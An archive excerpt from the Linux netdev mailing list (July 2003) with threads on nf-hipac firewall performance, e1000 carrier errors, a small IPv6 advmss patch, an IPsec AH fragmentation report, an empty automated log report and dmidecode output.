It could also be because you sent a log file in the wrong format or a file that isn't a common log file. A report was generated for the 0 records that could be extracted from your log file. From P@draigBrady.com Wed Jul 2 07:29:18 2003 Received: with ECARTIS (v1.0.0; list netdev); Wed, 02 Jul 2003 07:29:28 -0700 (PDT) Received: from corvil.com (gate.corvil.net [213.94.219.177]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h62ETG2x002532 for ; Wed, 2 Jul 2003 07:29:18 -0700 Received: from draigBrady.com (pixelbeat.local.corvil.com [172.18.1.170]) by corvil.com (8.12.9/8.12.5) with ESMTP id h62ETAlT092982; Wed, 2 Jul 2003 15:29:14 +0100 (IST) (envelope-from P@draigBrady.com) Message-ID: <3F02EAE2.8050609@draigBrady.com> Date: Wed, 02 Jul 2003 15:23:30 +0100 From: P@draigBrady.com User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.4) Gecko/20030617 X-Accept-Language: en-us, en MIME-Version: 1.0 To: nf@hipac.org CC: linux-kernel@vger.kernel.org, netdev@oss.sgi.com Subject: Re: [ANNOUNCE] nf-hipac v0.8 released References: <200307021426.56138.nf@hipac.org> <3F02D964.7050301@draigBrady.com> <200307021548.19989.nf@hipac.org> In-Reply-To: <200307021548.19989.nf@hipac.org> Content-Type: text/plain; charset=ISO-8859-1; format=flowed X-MIME-Autoconverted: from 8bit to quoted-printable by corvil.com id h62ETAlT092982 Content-Transfer-Encoding: 8bit X-MIME-Autoconverted: from quoted-printable to 8bit by oss.sgi.com id h62ETG2x002532 X-archive-position: 3722 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: P@draigBrady.com Precedence: bulk X-list: netdev Michael Bellion and Thomas Heinz wrote: > Hi Pádraig > > >>>Since real world network traffic always consists of a lot of different >>>sized packets taking maximum sized packets is very euphemistic. 1450 byte >>>packets at 950 Mbit/s correspond to approx. 80,000 packets/sec. 
>>>We are really interested in how our algorithm performs at higher packet >>>rates. Our performance tests are based on 100 Mbit hardware so we coudn't >>>test with more than approx. 80,000 packets/sec even with minimum sized >>>packets. >> >>Interrupt latency is the problem here. You'll require napi et. al >>to get over this hump. > > Yes we know, but with 128 byte frame size you can archieve a packet rate of at > most 97,656 packets/sec (in theory) on 100 Mbit hardware. We don't think this > few more packets would have changed the results fundamentally, so it's > probably not worth it on 100 Mbit. I was testing with 64 byte packets (so around 190Kpps). e100 cards at least have a handy mode for continually sending a packet as fast as possible. Also you can use more than one interface. So 100Mb is very useful for testing. For the test below I was using a rate of around 85Kpps. > Certainly you are right, that napi is required on gigabit to saturate the link > with small sized packets. > >>Cool. The same sort of test with ordinary netfilter that >>I did showed it could only handle around 125 rules at this >>packet rate on a 1.4GHz PIII, e1000 @ 100Mb/s. >> >># ./readprofile -m /boot/System.map | sort -nr | head -30 >> 6779 total 0.0047 >> 4441 default_idle 69.3906 >> 787 handle_IRQ_event 7.0268 >> 589 ip_packet_match 1.6733 >> 433 ipt_do_table 0.6294 >> 106 eth_type_trans 0.5521 >> [...] > > What do you want to show with this profile? Most of the time is spend in the > idle loop and in irq handling and only a few percentage in ip_packet_match > and ipt_do_table, so we don't quite get how this matches your statement > above. Could you explain this in a few words? Confused me too. The system would lock up and start dropping packets after 125 rules. I.E. it would linearly degrade as more rules were added. I'm guessing there is a fixed interrupt overhead that is accounted for by default_idle? 
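The quoted readprofile lines can be turned into shares of the total tick count, which makes the point under discussion easier to see. This is a rough sketch only: it assumes the three columns are tick count, symbol name and normalized load, uses just the six lines quoted above, and the function name is invented for illustration.

```python
# The six profile lines quoted above: ticks, symbol, normalized load.
PROFILE = """\
6779 total 0.0047
4441 default_idle 69.3906
787 handle_IRQ_event 7.0268
589 ip_packet_match 1.6733
433 ipt_do_table 0.6294
106 eth_type_trans 0.5521
"""


def tick_shares(profile_text):
    """Return {symbol: percent of total ticks} for readprofile-style text."""
    rows = [line.split() for line in profile_text.splitlines() if line.strip()]
    ticks = {name: int(count) for count, name, _load in rows}
    total = ticks.pop("total")  # the 'total' row is the denominator
    return {name: 100.0 * count / total for name, count in ticks.items()}


shares = tick_shares(PROFILE)
for name, percent in shares.items():
    print(f"{name:20s} {percent:5.1f}%")

# Rule matching is split across two symbols, so add them up.
matching = shares["ip_packet_match"] + shares["ipt_do_table"]
print(f"{'rule matching':20s} {matching:5.1f}%")
```

On these numbers roughly two thirds of the samples fall in default_idle, which is the mismatch the question above is pointing at.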
Note the e1000 drivers were left in the default config so there could definitely be some tuning done here. Note I changed netfilter slightly to accept promiscuous traffic which is done in ip_rcv() and then the packets are just dropped after the (match any in the test case) rules are traversed. Pádraig. From or@logreport.org Wed Jul 2 07:33:23 2003 Received: with ECARTIS (v1.0.0; list netdev); Wed, 02 Jul 2003 07:33:30 -0700 (PDT) Received: from hibou.logreport.org (postfix@logreport.IAE.nl [212.61.24.7]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h62EXB2x002870 for ; Wed, 2 Jul 2003 07:33:12 -0700 Received: by hibou.logreport.org (Postfix, from userid 1005) id 106D5C039; Wed, 2 Jul 2003 16:00:21 +0200 (CEST) Content-Type: text/plain; name="report.txt" Content-Disposition: inline; filename="report.txt" MIME-Version: 1.0 X-Mailer: MIME-tools 5.411 (Entity 5.404) To: netdev@oss.sgi.com From: log@logreport.org Subject: [LogReport] common report (was: Re: Movie) Reply-To: support@logreport.org Message-Id: <20030702140021.106D5C039@hibou.logreport.org> Date: Wed, 2 Jul 2003 16:00:21 +0200 (CEST) Content-Transfer-Encoding: 8bit X-MIME-Autoconverted: from quoted-printable to 8bit by oss.sgi.com id h62EXB2x002870 X-archive-position: 3723 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: log@logreport.org Precedence: bulk X-list: netdev Report generated: 2003-07-02 16:00:16 CEST Reporting on period: Unknown Period Activity Reports ---------------- Number of Requests Served by 1d Period No content in report. Total Size of Requests Served By 1d Period No content in report. User Sessions By 1d Period No content in report. 
Number of Requests Served by 1h Timeslot Timeslot Requests % Total ------------------------------------------------------- -------- ------- 00:00 0 NaN 01:00 0 NaN 02:00 0 NaN 03:00 0 NaN 04:00 0 NaN 05:00 0 NaN 06:00 0 NaN 07:00 0 NaN 08:00 0 NaN 09:00 0 NaN 10:00 0 NaN 11:00 0 NaN 12:00 0 NaN 13:00 0 NaN 14:00 0 NaN 15:00 0 NaN 16:00 0 NaN 17:00 0 NaN 18:00 0 NaN 19:00 0 NaN 20:00 0 NaN 21:00 0 NaN 22:00 0 NaN 23:00 0 NaN Number of Requests by Request's Size No content in report. Total size of requests served by directory, Top 10 No content in report. Visitors Reports ---------------- Number of Requests by Client Hosts, Top 10 No content in report. Total size of requests by Client Hosts, Top 10 No content in report. Requests By Top Level Domain The "top level domain" is determined from the hostname of the client. There is no real correlation to where the user is geographically located. For example, a client connecting from the hostname ppp10.nl-div.globalcorp.co.uk will get listed as a United Kindom top level domain, even when that user is connecting from a division in The Netherlands. No content in report. Accessed Pages Reports ---------------------- Applied filter in this section: excluded requests matching "\.(png|gif|jpg|jpeg|css)$" Number of Requests Served by 1d Period No content in report. Most Requested Pages, Top 10 No content in report. Most Requested URLs, Top 10, Top 5 URLs No content in report. Session Reports --------------- First Page In User Session, Top 10 - means that only images were requested. No content in report. Last Page In User Session, Top 10 - means that only images were requested. No content in report. User Sessions by Their Recurrence No content in report. Visit Duration Duration is given in seconds. No content in report. Number of Pages per Visit No content in report. Top Traversals, Top 10 Start Page, Top 5 2nd Pages, Top 5 3rd Page No content in report. 
Download Reports ---------------- Applied filter in this section: selected requests matching \.(gz|tgz|zip|exe|pdf|doc)$ Number of Requests Served by 1d Period No content in report. Most Requested Pages, Top 10 No content in report. Most Requested URLs, Top 10, Top 5 URLs No content in report. Browsers and Platforms Reports ------------------------------ Top 10 Requests By Browser The "browser" is determined from the User-Agent header. It is possible for a user to change that string. This means that the value Internet Explorer could be sent by a user running a customized version of Mozilla. No content in report. Top 10 Requests By Operating System The "operating system" is determined from the User-Agent header. It is possible for a user to change that string. This means that the value Mac PowerPC could be attributed to a user who is really running a customized version of Mozilla under GNU/Linux. No content in report. Top 10 Requests By Browser Language The "language" is determined from the User-Agent header. Users can set this variable to indicate their preferred language. No content in report. Top 10 Requests By Robot No content in report. Search Engines and "Referers" ----------------------------- Applied filter in this section: excluded requests with a referer matching "^-$" Top 10 Referring Sites No content in report. Top 10 Referring Pages No content in report. Top Referring Pages By Requested Page, Top 5 Referrers, Top 10 Pages No content in report. Most Travelled Referer -> Pages Connection, Top 10 No content in report. Requests By Search Engine No content in report. Requests By Keywords, Top 10 No content in report. Requests by Search Engine with Keywords, Top 10 Search Engines, Top 5 Keywords No content in report. Abuse Reports ------------- Requests By Attack No content in report. Compression Reports ------------------- Requests By Gzip Result No content in report. Most Average Compressed Requested URL, Top 10 Compression is in percent. 
No content in report. File Types With Highest Average Compression Level, Top 10 Compression is in percent. No content in report. Technical Reports ----------------- Requests By HTTP Method No content in report. Requests By HTTP Protocol Version No content in report. Requests By HTTP Result The most common HTTP status codes are given below: 200 OK (The request has succeeded.) 201 Created (The request has been fulfilled and resulted in a new resource being created.) 206 Partial Content (The server has fulfilled the partial GET request for the resource.) 301 Moved Permanently (The requested resource has been assigned a new permanent URI and any future references to this resource SHOULD use one of the returned URIs.) 302 Found (The requested resource resides temporarily under a different URI.) 304 Not Modified (The client has performed a conditional GET request and access is allowed, but the document has not been modified.) 403 Forbidden (The server understood the request, but is refusing to fulfill it.) 404 Not Found (The server has not found anything matching the Request-URI.) No content in report. Requests by Client Hosts By HTTP Result, Top 5 Clients No content in report. Requests by URL By HTTP Result, Top 5 URLs No content in report. -- LogReport sent to you by http://www.LogReport.org/ or@hibou.logreport.org mailto:logreport@logreport.org running lire-1.3.tar.gz The Online Report Responder Service is free of charge. We do not accept any liability however incurred in respect of a failure to perform as is imputable to the same for any loss direct or indirect. If you use the responder on a regular basis, please subscribe to our announcement mailing list (http://logreport.org/contact/lists/) to keep informed on updates and modification to the service. To support the online responder, make a donation to the LogReport Foundation (http://logreport.org/about/donate.php). 
From Larry.Sendlosky@storigen.com Wed Jul 2 07:59:45 2003 Received: with ECARTIS (v1.0.0; list netdev); Wed, 02 Jul 2003 07:59:49 -0700 (PDT) Received: from xchangeserver2.storigen.com ([65.193.106.66]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h62Exi2x003368 for ; Wed, 2 Jul 2003 07:59:45 -0700 X-MimeOLE: Produced By Microsoft Exchange V6.0.6375.0 content-class: urn:content-classes:message MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Subject: e1000 in 2.4.21 and carrier errors Date: Wed, 2 Jul 2003 10:59:31 -0400 Message-ID: <7BFCE5F1EF28D64198522688F5449D5A01FF2AF7@xchangeserver2.storigen.com> X-MS-Has-Attach: X-MS-TNEF-Correlator: Thread-Topic: e1000 in 2.4.21 and carrier errors Thread-Index: AcNAqop9ROmFxCNxTqOmxIx5r8BIYg== From: "Larry Sendlosky" To: Content-Transfer-Encoding: 8bit X-MIME-Autoconverted: from quoted-printable to 8bit by oss.sgi.com id h62Exi2x003368 X-archive-position: 3724 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: Larry.Sendlosky@storigen.com Precedence: bulk X-list: netdev

We started running 2.4.21 and use the e1000 driver in the kernel. Our NICs are PRO-1000 82543GC based copper. Using the new driver we see a constant increase in carrier errors. Loading the Intel e1000 v3.6.8.1 driver we have no carrier errors. This happens on all our systems with the PRO-1000 card using 2.4.21 and RH9. Switches are a mixture of Dell, Asante, Cisco, and Extreme.

Any ideas?
thanks larry From jmorris@intercode.com.au Wed Jul 2 09:01:11 2003 Received: with ECARTIS (v1.0.0; list netdev); Wed, 02 Jul 2003 09:01:15 -0700 (PDT) Received: from blackbird.intercode.com.au (IDENT:FHRUnQvXcBJGTwFDC/PQq8eV2MOvvdEj@blackbird.intercode.com.au [203.32.101.10]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h62G172x004202 for ; Wed, 2 Jul 2003 09:01:09 -0700 Received: from excalibur.intercode.com.au (excalibur.intercode.com.au [203.32.101.12]) by blackbird.intercode.com.au (8.11.6p2/8.9.3) with ESMTP id h62G09r13320; Thu, 3 Jul 2003 02:00:10 +1000 Date: Thu, 3 Jul 2003 02:00:09 +1000 (EST) From: James Morris To: kuznet@ms2.inr.ac.ru cc: "David S. Miller" , , , Subject: Re: Fw: [PATCH 2.4.22-bk] dev->promiscuity refcounting broken in In-Reply-To: <200307020517.JAA05258@dub.inr.ac.ru> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII X-archive-position: 3725 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: jmorris@intercode.com.au Precedence: bulk X-list: netdev On Wed, 2 Jul 2003 kuznet@ms2.inr.ac.ru wrote: > Dave, the patch looks OK. 
Applied to bk://kernel.bkbits.net/jmorris/net-2.5 and bk://kernel.bkbits.net/jmorris/net-2.4 - James -- James Morris From nf@hipac.org Wed Jul 2 09:58:11 2003 Received: with ECARTIS (v1.0.0; list netdev); Wed, 02 Jul 2003 09:58:22 -0700 (PDT) Received: from indyio.rz.uni-saarland.de (indyio.rz.uni-saarland.de [134.96.7.3]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h62Gw92x005473 for ; Wed, 2 Jul 2003 09:58:10 -0700 Received: from mars.rz.uni-saarland.de (mars.rz.uni-saarland.de [134.96.7.4]) by indyio.rz.uni-saarland.de (8.12.9/8.12.5) with ESMTP id h62Gw3fZ067817; Wed, 2 Jul 2003 18:58:03 +0200 (CEST) Received: from e002.stw.stud.uni-saarland.de (e002.stw.stud.uni-saarland.de [134.96.65.17]) by mars.rz.uni-saarland.de (8.9.3p2/8.8.4/8.8.2) with ESMTP id SAA279378; Wed, 2 Jul 2003 18:58:02 +0200 (CEST) Received: from e226.stw.stud.uni-saarland.de ([134.96.65.241] helo=hipac.org) by e002.stw.stud.uni-saarland.de with esmtp (Exim 3.35 #1 (Debian)) id 19Xkvi-0007iJ-00; Wed, 02 Jul 2003 18:58:02 +0200 Message-ID: <3F030EFC.7090809@hipac.org> Date: Wed, 02 Jul 2003 18:57:32 +0200 From: Michael Bellion and Thomas Heinz User-Agent: Mozilla/5.0 (X11; U; Linux i686; de-AT; rv:1.0.0) Gecko/20020623 Debian/1.0.0-0.woody.1 X-Accept-Language: de, en MIME-Version: 1.0 To: P@draigbrady.com CC: linux-kernel@vger.kernel.org, netdev@oss.sgi.com Subject: Re: [ANNOUNCE] nf-hipac v0.8 released References: <200307021426.56138.nf@hipac.org> <3F02D964.7050301@draigBrady.com> <200307021548.19989.nf@hipac.org> <3F02EAE2.8050609@draigBrady.com> Content-Type: text/plain; charset=ISO-8859-1; format=flowed X-MIME-Autoconverted: from 8bit to quoted-printable by indyio.rz.uni-saarland.de id h62Gw3fZ067817 Content-Transfer-Encoding: 8bit X-MIME-Autoconverted: from quoted-printable to 8bit by oss.sgi.com id h62Gw92x005473 X-archive-position: 3726 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: nf@hipac.org Precedence: 
bulk X-list: netdev

Hi Pádraig

You wrote:
> I was testing with 64 byte packets (so around 190Kpps). e100 cards at
> least have a handy mode for continually sending a packet as fast as
> possible. Also you can use more than one interface.

Yes, that's true. When we did the performance tests we had in mind to compare the worst case behaviour of nf-hipac and iptables. Therefore we designed a ruleset which models the worst case for both iptables and nf-hipac. Of course, the test environment could have been tuned a lot more, e.g. udp instead of tcp, FORWARD chain instead of INPUT, tuned network parameters, more interfaces etc.

Anyway, we prefer independent, more sophisticated performance tests.

>>> # ./readprofile -m /boot/System.map | sort -nr | head -30
>>>   6779 total                0.0047
>>>   4441 default_idle        69.3906
>>>    787 handle_IRQ_event     7.0268
>>>    589 ip_packet_match      1.6733
>>>    433 ipt_do_table         0.6294
>>>    106 eth_type_trans       0.5521
>>> [...]
>
> Confused me too. The system would lock up and start dropping
> packets after 125 rules. I.E. it would linearly degrade
> as more rules were added. I'm guessing there is a fixed
> interrupt overhead that is accounted for
> by default_idle?

Hm, but once the system starts to drop packets ip_packet_match and ipt_do_table start to dominate the profile, don't they?
Regards, +-----------------------+----------------------+ | Michael Bellion | Thomas Heinz | | | | +-----------------------+----------------------+ From yoshfuji@linux-ipv6.org Wed Jul 2 10:54:15 2003 Received: with ECARTIS (v1.0.0; list netdev); Wed, 02 Jul 2003 10:54:22 -0700 (PDT) Received: from yue.hongo.wide.ad.jp (yue.hongo.wide.ad.jp [203.178.139.94]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h62HsD2x006724 for ; Wed, 2 Jul 2003 10:54:15 -0700 Received: from localhost (localhost [127.0.0.1]) by yue.hongo.wide.ad.jp (8.12.3+3.5Wbeta/8.12.3/Debian-5) with ESMTP id h62HtTBo003477; Thu, 3 Jul 2003 02:55:30 +0900 Date: Thu, 03 Jul 2003 02:55:29 +0900 (JST) Message-Id: <20030703.025529.100658086.yoshfuji@linux-ipv6.org> To: davem@redhat.com, jmorris@intercode.com.au CC: netdev@oss.sgi.com Subject: [PATCH] IPV6: fix a mistake in ipv6_advmss() conversion From: YOSHIFUJI Hideaki / =?iso-2022-jp?B?GyRCNUhGIzFRTEAbKEI=?= Organization: USAGI Project X-URL: http://www.yoshifuji.org/%7Ehideaki/ X-Fingerprint: 90 22 65 EB 1E CF 3A D1 0B DF 80 D8 48 07 F8 94 E0 62 0E EA X-PGP-Key-URL: http://www.yoshifuji.org/%7Ehideaki/hideaki@yoshifuji.org.asc X-Face: "5$Al-.M>NJ%a'@hhZdQm:."qn~PA^gq4o*>iCFToq*bAi#4FRtx}enhuQKz7fNqQz\BYU] $~O_5m-9'}MIs`XGwIEscw;e5b>n"B_?j/AkL~i/MEaZBLP X-Mailer: Mew version 2.2 on Emacs 20.7 / Mule 4.1 (AOI) Mime-Version: 1.0 Content-Type: Text/Plain; charset=us-ascii Content-Transfer-Encoding: 7bit X-archive-position: 3727 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: yoshfuji@linux-ipv6.org Precedence: bulk X-list: netdev Hello. Sorry, I introduced a bug in ipv6_advmss() while converting advmss calculation to inline function. This patch fixes the bug. 
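As a rough illustration of what the fix restores, the calculation can be sketched as a standalone user-space function. This is not the kernel code: `advmss_from_mtu` and its `min_advmss` parameter are hypothetical names standing in for `ipv6_advmss()` and `ip6_rt_min_advmss`, the header sizes are the fixed 40-byte IPv6 header and the 20-byte TCP header without options, and the precondition check is an addition made only to keep the sketch safe.

```c
#include <assert.h>

/* Fixed header sizes: IPv6 header, and TCP header without options. */
#define IPV6_HDR_LEN 40u
#define TCP_HDR_LEN  20u

/*
 * Hypothetical user-space stand-in for ipv6_advmss(). min_advmss plays
 * the role of ip6_rt_min_advmss and is passed in as a parameter here.
 */
unsigned int advmss_from_mtu(unsigned int mtu, unsigned int min_advmss)
{
	/* Sketch-only precondition: the MTU must cover both headers. */
	assert(mtu >= IPV6_HDR_LEN + TCP_HDR_LEN);

	/* The step the patch restores: advertise payload room, not the raw MTU. */
	mtu -= IPV6_HDR_LEN + TCP_HDR_LEN;

	/* Never advertise less than the configured minimum. */
	if (mtu < min_advmss)
		mtu = min_advmss;
	return mtu;
}
```

Under these assumptions a 1500-byte MTU gives an advertised MSS of 1440. Without the subtraction the raw MTU of 1500 would be advertised, which is the mistake described above.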
Index: linux-2.5/net/ipv6/route.c
===================================================================
RCS file: /home/cvs/linux-2.5/net/ipv6/route.c,v
retrieving revision 1.43
diff -u -r1.43 route.c
--- linux-2.5/net/ipv6/route.c 28 Jun 2003 03:58:20 -0000 1.43
+++ linux-2.5/net/ipv6/route.c 2 Jul 2003 16:25:04 -0000
@@ -602,6 +602,8 @@
 static inline unsigned int ipv6_advmss(unsigned int mtu)
 {
+	mtu -= sizeof(struct ipv6hdr) + sizeof(struct tcphdr);
+
 	if (mtu < ip6_rt_min_advmss)
 		mtu = ip6_rt_min_advmss;

--
Hideaki YOSHIFUJI @ USAGI Project
GPG FP: 9022 65EB 1ECF 3AD1 0BDF 80D8 4807 F894 E062 0EEA

From scott.feldman@intel.com Wed Jul 2 13:53:15 2003 Received: with ECARTIS (v1.0.0; list netdev); Wed, 02 Jul 2003 13:53:22 -0700 (PDT) Received: from hermes.fm.intel.com (fmr01.intel.com [192.55.52.18]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h62KrF2x008796 for ; Wed, 2 Jul 2003 13:53:15 -0700 Received: from petasus.fm.intel.com (petasus.fm.intel.com [10.1.192.37]) by hermes.fm.intel.com (8.11.6p2/8.11.6/d: outer.mc,v 1.66 2003/05/22 21:17:36 rfjohns1 Exp $) with ESMTP id h62KmMB03526 for ; Wed, 2 Jul 2003 20:48:22 GMT Received: from fmsmsxv040-1.fm.intel.com (fmsmsxv040-1.fm.intel.com [132.233.48.108]) by petasus.fm.intel.com (8.11.6p2/8.11.6/d: inner.mc,v 1.35 2003/05/22 21:18:01 rfjohns1 Exp $) with SMTP id h62KkGZ09881 for ; Wed, 2 Jul 2003 20:46:16 GMT Received: from [134.134.179.196] ([134.134.179.196]) by fmsmsxv040-1.fm.intel.com (NAVGW 2.5.2.11) with SMTP id M2003070213524023002 ; Wed, 02 Jul 2003 13:52:40 -0700 Date: Wed, 2 Jul 2003 14:09:09 -0700 (PDT) From: "Feldman, Scott" X-X-Sender: scott.feldman@localhost.localdomain Reply-To: "Feldman, Scott" To: Larry Sendlosky cc: netdev@oss.sgi.com Subject: Re: e1000 in 2.4.21 and carrier errors In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII X-archive-position: 3728 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com
X-original-sender: scott.feldman@intel.com Precedence: bulk X-list: netdev

On Wed, 2 Jul 2003, Larry Sendlosky wrote:

> We started running 2.4.21 and use the e1000 driver in the kernel. Our
> NICs are PRO-1000 82543GC based copper. Using the new driver we see
> a constant increase in carrier errors. Loading the Intel e1000 v3.6.8.1
> driver we have no carrier errors. This happens on all our systems with
> the PRO-1000 card using 2.4.21 and RH9. Switches are a mixture of Dell,
> Asante, Cisco, and Extreme.
>
> Any ideas?

Hi Larry, apply this patch to 3.6.8.1 and see if you get carrier errors. Looks to me like a bug that was fixed in later drivers. Doesn't explain why we're getting carrier errors, but this will let us move forward to 2.4.21.

What are you testing with? Do you have any newer adapters (82544/5/6) you could try in the same setup?

-scott

diff -Naurp e1000-3.6.8.1/src/e1000_main.c e1000-3.6.8.1-mod/src/e1000_main.c
--- e1000-3.6.8.1/src/e1000_main.c 2001-12-28 15:06:18.000000000 -0800
+++ e1000-3.6.8.1-mod/src/e1000_main.c 2003-07-02 14:03:02.000000000 -0700
@@ -2928,6 +2928,7 @@ UpdateStatsCounters(struct adapter * Ada
 	Adapter->net_stats.tx_aborted_errors = Adapter->Ecol;
 	Adapter->net_stats.tx_fifo_errors = Adapter->Tuc;
 	Adapter->net_stats.tx_window_errors = Adapter->Latecol;
+	Adapter->net_stats.tx_carrier_errors = Adapter->Tncrs;
 	/* Tx Dropped needs to be maintained elsewhere */

From latten@austin.ibm.com Wed Jul 2 16:50:05 2003 Received: with ECARTIS (v1.0.0; list netdev); Wed, 02 Jul 2003 16:50:11 -0700 (PDT) Received: from e35.co.us.ibm.com (e35.co.us.ibm.com [32.97.110.133]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h62No42x012030 for ; Wed, 2 Jul 2003 16:50:05 -0700 Received: from westrelay04.boulder.ibm.com (westrelay04.boulder.ibm.com [9.17.193.32]) by e35.co.us.ibm.com (8.12.9/8.12.2) with ESMTP id h62NnJxe106086; Wed, 2 Jul 2003 19:49:19 -0400 Received: from austin.ibm.com (d03av02.boulder.ibm.com [9.17.193.82]) by westrelay04.boulder.ibm.com
(8.12.9/NCO/VER6.5) with ESMTP id h62NnGsH202560; Wed, 2 Jul 2003 17:49:17 -0600 Received: from faith.austin.ibm.com (faith.austin.ibm.com [9.41.94.16]) by austin.ibm.com (8.12.9/8.12.9) with ESMTP id h62NnGTi030114; Wed, 2 Jul 2003 18:49:16 -0500 Received: from faith.austin.ibm.com (localhost.localdomain [127.0.0.1]) by faith.austin.ibm.com (8.12.5/8.12.8) with ESMTP id h62NsOIY002989; Wed, 2 Jul 2003 18:54:24 -0500 Received: (from jml@localhost) by faith.austin.ibm.com (8.12.5/8.12.5/Submit) id h62NsMYP002987; Wed, 2 Jul 2003 18:54:23 -0500 Date: Wed, 2 Jul 2003 18:54:23 -0500 From: latten@austin.ibm.com Message-Id: <200307022354.h62NsMYP002987@faith.austin.ibm.com> To: netdev@oss.sgi.com Subject: IPSecv6 AH doesn't work with Fragmenting Cc: davem@redhat.com, kuznet@ms2.inr.ac.ru X-archive-position: 3729 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: latten@austin.ibm.com Precedence: bulk X-list: netdev

I am using netperf to stress IPSecv6 with AH protocol. Netperf sent a stream of TCP packets to the receiver. I examined the log on my receiver and saw many "IPSec ah authentication error" messages. I then sniffed my incoming packets and saw that they had been fragmented and each fragment was reported as being malformed.

   Source            Destination       Protocol  Info
1  fec0:0:0:105::56  fec0:0:0:105::55  TCP       32780 > 32772 [ACK]...
2  fec0:0:0:105::56  fec0:0:0:105::55  AH        AH (SPI=0x00000000)[Malformed Packet]
3  fec0:0:0:105::55  fec0:0:0:105::56  TCP       32772 > 32780 [ACK]...
4  fec0:0:0:105::56  fec0:0:0:105::55  TCP       32780 > 32772 [ACK]...
5  fec0:0:0:105::56  fec0:0:0:105::55  AH        AH (SPI=0x00000000)[Malformed Packet]

Just for the heck of it, I did a "ping6 -s 1800" and sniffed the wire and although the ping/ICMPv6 works fine in that I get a reply and no authentication failures are logged, my packets are reported as being malformed.
It seems AH with fragmenting is not working properly and perhaps that is the cause of all the AH authentication errors I see in my log. Unfortunately I could not cut and paste my ethereal output but if anyone is interested I could send it. It is also easy to reproduce. Just configure AHv6 manually between two machines and run netperf or ping6 -s or anything that would result in fragmentation. Joy From zwane@arm.linux.org.uk Wed Jul 2 17:16:19 2003 Received: with ECARTIS (v1.0.0; list netdev); Wed, 02 Jul 2003 17:16:32 -0700 (PDT) Received: from hemi.commfireservices.com ([66.212.224.118]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h630GF2x012524 for ; Wed, 2 Jul 2003 17:16:18 -0700 Received: from montezuma.mastecende.com (cuda.commfireservices.com [24.203.207.204]) by hemi.commfireservices.com (Postfix) with ESMTP id 59C34BC51; Wed, 2 Jul 2003 20:06:02 -0400 (EDT) Received: from localhost.localdomain (localhost.localdomain [127.0.0.1]) by montezuma.mastecende.com (8.12.8/8.12.8) with ESMTP id h63053vo011678; Wed, 2 Jul 2003 20:05:03 -0400 Date: Wed, 2 Jul 2003 20:05:03 -0400 (EDT) From: Zwane Mwaikambo X-X-Sender: zwane@montezuma.mastecende.com To: "Feldman, Scott" Cc: netdev@oss.sgi.com Subject: RE: e1000 lockup with port io type reset In-Reply-To: Message-ID: References: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII X-archive-position: 3730 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: zwane@arm.linux.org.uk Precedence: bulk X-list: netdev On Sat, 28 Jun 2003, Zwane Mwaikambo wrote: > Thanks, i just have to wait on the dmi decode. I'll have it to you ASAP. Here we go; # dmidecode 2.1 SMBIOS 2.3 present. 46 structures occupying 1342 bytes. Table at 0x000F2970. Handle 0x0000 DMI type 0, 20 bytes. BIOS Information Vendor: Award Software, Inc. 
Version: ASUS CUV4X-E ACPI BIOS Revision 1004 Release Date: 07/25/2001 Address: 0xF0000 Runtime Size: 64 kB ROM Size: 256 kB Characteristics: PCI is supported PNP is supported APM is supported BIOS is upgradeable BIOS shadowing is allowed ESCD support is available Boot from CD is supported Selectable boot is supported BIOS ROM is socketed EDD is supported 5.25"/360 KB floppy services are supported (int 13h) 5.25"/1.2 MB floppy services are supported (int 13h) 3.5"/720 KB floppy services are supported (int 13h) 3.5"/2.88 MB floppy services are supported (int 13h) Print screen service is supported (int 5h) 8042 keyboard services are supported (int 9h) Serial services are supported (int 14h) Printer services are supported (int 17h) CGA/mono video services are supported (int 10h) ACPI is supported AGP is supported Handle 0x0001 DMI type 1, 25 bytes. System Information Manufacturer: System Manufacturer Product Name: System Name Version: System Version Serial Number: SYS-1234567890 UUID: Not Settable Wake-up Type: Power Switch Handle 0x0002 DMI type 2, 8 bytes. Base Board Information Manufacturer: ASUSTeK Computer INC. Product Name: CUV4X-E Version: REV 1.xx Serial Number: xxxxxxxxxxx Handle 0x0003 DMI type 3, 17 bytes. Chassis Information Manufacturer: Chassis Manufacture Type: Tower Lock: Not Present Version: Chassis Version Serial Number: Chassis Serial Number Asset Tag: Asset-1234567890 Boot-up State: Safe Power Supply State: Safe Thermal State: Safe Security Status: Unknown OEM Information: 0x00000000 Handle 0x0004 DMI type 4, 32 bytes. 
